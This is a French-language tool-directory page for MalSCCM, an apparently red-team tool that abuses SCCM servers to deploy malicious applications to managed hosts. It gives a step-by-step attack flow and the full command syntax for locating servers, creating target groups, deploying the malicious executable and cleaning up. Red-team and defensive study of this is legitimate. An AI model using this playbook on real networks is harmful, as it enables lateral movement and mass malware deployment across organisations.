Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
MalSCCM — Abuser des serveurs SCCM pour déployer des applications malveillantes sur les hôtes gérés afin de faciliter les mouvements latéraux et les opérations d'équipe rouge. | Kitploit
Outils/GitHubGitHub/nettitude/malsccm
ExploitationMouvement LatéralTests d'IntrusionRed Teaming
GitHubnettitude/malsccm

MalSCCM

Abuser des serveurs SCCM pour déployer des applications malveillantes sur les hôtes gérés afin de faciliter les mouvements latéraux et les opérations d'équipe rouge.

Voir le dépôt
25638il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

MalSCCM

Cet outil permet d'abuser des serveurs SCCM locaux ou distants pour déployer des applications malveillantes sur les hôtes qu'ils gèrent. Pour utiliser cet outil, votre processus actuel doit disposer de droits administrateur sur le serveur SCCM.

En général, les déploiements de SCCM placent le serveur de gestion et le serveur principal sur le même hôte. Dans ce cas, l'hôte renvoyé par la commande locate peut être utilisé comme serveur principal.

Si ce n'est pas le cas, vous devrez compromettre l'hôte de gestion renvoyé par locate, afin de pouvoir exécuter à nouveau locate sur cet hôte et obtenir le nom d'hôte du serveur principal. Une fois que vous avez cela et un accès administrateur, vous êtes prêt !

Blog

Pour plus d'informations sur l'utilisation de l'outil, consultez le blog ci-dessous.

  • https://labs.nettitude.com/blog/introducing-malsccm/

Crédits

Un immense merci à PowerSCCM (https://github.com/PowerShellMafia/PowerSCCM) sur lequel tout cela est basé ; ce travail n'aurait pas été possible sans les contributions de @harmj0y, @jaredcatkinson, @enigma0x3, @mattifestation.

Flux d'attaque

  • Compromettre un client, utiliser locate pour trouver le serveur de gestion
  • Compromettre le serveur de gestion, utiliser locate pour trouver le serveur principal
  • Utiliser Inspect sur le serveur principal pour visualiser les cibles potentielles
  • Créer un nouveau groupe de périphériques pour les machines vers lesquelles vous souhaitez effectuer un mouvement latéral
  • Ajouter vos cibles dans le nouveau groupe
  • Créer une application pointant vers un exécutable malveillant situé sur un partage accessible en lecture mondiale
  • Déployer l'application sur le groupe cible
  • Forcer le groupe cible à vérifier les mises à jour
  • Profiter...
  • Nettoyer l'application et le déploiement
  • Supprimer le groupe

Menu d'aide

root@kitploit:~
Les commandes listées ci-dessous ont des paramètres optionnels entre <>.

Tenter de trouver les serveurs de gestion et principal SCCM :
    MalSCCM.exe locate

Inspecter le serveur principal pour recueillir des informations SCCM :
    MalSCCM.exe inspect </server:PrimarySiteHostname> </all /computers /deployments /groups /applications /forest /packages /primaryusers>

Créer/Modifier/Supprimer des groupes pour ajouter des cibles en vue de déployer des applications malveillantes. Les groupes peuvent être destinés aux périphériques ou aux utilisateurs :
    MalSCCM.exe group /create /groupname:example /grouptype:[user|device] </server:PrimarySiteHostname>
    MalSCCM.exe group /delete /groupname:example </server:PrimarySiteHostname>
    MalSCCM.exe group /addhost /groupname:example /host:examplehost </server:PrimarySiteHostname>
    MalSCCM.exe group /adduser /groupname:example /user:exampleuser </server:PrimarySiteHostname>

Créer/Déployer/Supprimer des applications malveillantes :
    MalSCCM.exe app /create /name:appname /uncpath:""\\unc\path"" </server:PrimarySiteHostname>
    MalSCCM.exe app /delete /name:appname </server:PrimarySiteHostname>
    MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 </server:PrimarySiteHostname>
    MalSCCM.exe app /deletedeploy /name:appname </server:PrimarySiteHostname>
    MalSCCM.exe app /cleanup /name:appname </server:PrimarySiteHostname>

Forcer les périphériques d'un groupe à vérifier les mises à jour dans les minutes qui suivent :
    MalSCCM.exe checkin /groupname:example </server:PrimarySiteHostname>
Télécharger l’outil